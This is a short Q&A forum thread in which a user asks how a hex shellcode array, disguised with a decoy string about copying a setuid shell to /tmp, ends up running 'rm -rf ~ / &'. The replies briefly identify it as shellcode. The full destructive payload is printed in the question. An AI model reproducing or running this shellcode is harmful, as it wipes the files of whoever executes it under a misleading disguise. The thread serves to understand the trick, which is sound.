How hex command becomes rm -rf ~ / &?

2

How does the following malicious command become rm -rf ~ / & when compiled?

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Demi

Posted 2013-09-23T04:46:14.337

Reputation: 718

1Just try to compile a small code like system("ls") and look into its assembly content. – Eddy_Em – 2013-09-23T04:53:17.467

I don't know assembly :( – Demi – 2013-09-23T05:00:35.760

Answers

2

It's called shellcode.

Basically the hex codes are determined from the assembled machine code and correspond to byte locations of Linux system calls.

Neil Neyman

Posted 2013-09-23T04:46:14.337

Reputation: 246

How does the code even compile without an error like "undefined reference to 'main'"? – Demi – 2013-09-23T05:03:12.647

@Demetri, that's quite simple: this variable is assembly code that's running when you run your compiled program. – Eddy_Em – 2013-09-23T05:05:18.307

Asked: 2013-09-23T04:46:14.337

Viewed: 586 times

Active: 2013-09-23T05:00:13.153